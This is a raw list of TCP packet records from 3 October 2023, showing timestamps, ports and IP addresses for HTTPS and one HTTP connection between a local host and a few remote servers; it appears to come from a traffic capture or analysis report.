Oct 3, 2023 22:34:59.376591921 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.376620054 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.377561092 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.377582073 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.377640963 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.377650976 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.377687931 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.377707005 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.378968954 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.378993988 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.379050016 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.379060984 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.379087925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.379117012 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.380017042 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.380036116 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.380100965 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.380111933 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.380139112 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.380170107 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.380913973 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.380933046 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.380985022 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.380995035 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.381022930 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.381053925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.381678104 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.381702900 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.381757975 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.381768942 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.381793976 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.381829023 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.382963896 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.382989883 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.383054972 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.383066893 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.383090973 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.383121967 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.383812904 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.383836031 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.383893013 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.383903980 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.383930922 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.383953094 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.385150909 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.385176897 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.385232925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.385243893 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.385268927 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.385303974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.386287928 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.386311054 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.386362076 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.386373043 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.386403084 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.386429071 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.387587070 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.387609005 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.387676001 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.387686968 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.387726068 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.387747049 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.389319897 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.389344931 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.389399052 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.389409065 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.389437914 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.389461994 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.390945911 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.390966892 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.391015053 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.391026020 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.391051054 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.391082048 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.392518997 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.392540932 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.392587900 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.392597914 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.392626047 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.392646074 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.394809961 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.394831896 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.394884109 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.394895077 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.394923925 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.394948006 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.395904064 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.395926952 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.395977974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.395988941 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.396015882 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.396044016 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.396790981 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.396811008 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.396863937 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.396874905 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.396908045 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.396929026 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.398098946 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.398127079 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.398189068 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.398200035 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.398228884 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.398264885 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.399017096 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.399036884 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.399084091 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.399095058 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.399122000 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.399149895 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.399914026 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.399933100 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.399986982 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.399996996 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.400028944 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.400047064 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.400691986 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.400718927 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.400883913 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.400895119 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.401001930 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.401462078 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.401489019 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.401540041 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.401551008 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.401578903 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.401616096 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.402276993 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.402304888 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.402358055 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.402369022 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.402415037 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.402442932 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403067112 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403096914 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403150082 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403161049 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403193951 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403215885 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403825998 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403846979 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403906107 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403915882 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.403953075 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.403975964 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.404753923 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.404778957 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.404840946 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.404850960 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.404889107 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.404917002 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.405642986 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.405663967 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.405725956 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.405736923 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.405761957 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.405795097 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.406416893 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.406445026 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.406569958 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.406580925 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.406953096 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.407185078 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.407205105 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.407255888 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.407267094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.407299995 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.407326937 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.407960892 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.407980919 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.408047915 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.408058882 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.408118010 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.408672094 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.408693075 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.408750057 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.408761024 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.408802986 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.408821106 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.409482002 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.409504890 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.409575939 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.409588099 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.409638882 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.410202980 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.410223961 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.410295963 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.410305977 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.410340071 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.410361052 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.411046982 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.411072969 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.411133051 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.411144018 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.411185980 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.411205053 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.411950111 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.411969900 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.412035942 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.412045956 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.412095070 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.412116051 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.412991047 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413012028 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413073063 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.413083076 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413124084 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.413147926 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.413719893 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413748026 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413805962 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.413816929 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.413849115 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.413873911 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.415079117 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.415106058 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.415185928 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.415195942 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.415226936 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.415256977 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.416601896 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.416631937 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.416687965 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.416698933 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.416726112 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.416754007 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.417319059 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.417337894 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.417387962 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.417397976 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.417434931 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.417454004 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.418210030 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.418231964 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.418291092 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.418302059 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.418333054 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.418349981 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.418948889 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.418970108 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.419039011 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.419049025 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.419083118 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.419116974 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.419306040 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.419378042 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.419394970 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.419416904 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.419481039 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.437947989 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.454829931 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.454895973 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:34:59.454941034 CEST	49776	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:34:59.454958916 CEST	443	49776	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.727595091 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:09.727664948 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.727754116 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:09.731046915 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:09.731086016 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.938854933 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.938951015 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:09.940138102 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:09.940157890 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.940692902 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:09.995501041 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:10.013015032 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:10.054474115 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:10.129291058 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:10.129462004 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:10.129584074 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:10.130487919 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:10.130487919 CEST	49779	443	192.168.2.4	136.144.57.121
Oct 3, 2023 22:35:10.130556107 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:10.130589008 CEST	443	49779	136.144.57.121	192.168.2.4
Oct 3, 2023 22:35:14.289400101 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.289436102 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.289499044 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.329258919 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.329273939 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.545037031 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.545114994 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.546931982 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.546940088 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.547420979 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.589534044 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.684922934 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.730448961 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.781023026 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:14.781516075 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:14.781541109 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.217916965 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.218082905 CEST	443	49790	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.218135118 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.242597103 CEST	49790	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.253330946 CEST	49777	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:15.378163099 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.378187895 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.378232002 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.378624916 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.378633022 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.502681971 CEST	80	49777	132.226.247.73	192.168.2.4
Oct 3, 2023 22:35:15.586471081 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.588309050 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.588324070 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.814179897 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:15.814800978 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:15.814815998 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.250402927 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.250608921 CEST	443	49795	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.250669003 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.251075983 CEST	49795	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.425262928 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.425308943 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.425365925 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.425697088 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.425712109 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.640760899 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.642254114 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.642282009 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.870156050 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:16.870563984 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:16.870587111 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:17.309077978 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:17.309263945 CEST	443	49799	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:17.309336901 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:17.309665918 CEST	49799	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:17.951351881 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:17.951420069 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:17.951476097 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:17.952083111 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:17.952101946 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.158960104 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.160470963 CEST	49801	443	192.168.2.4	172.67.150.79
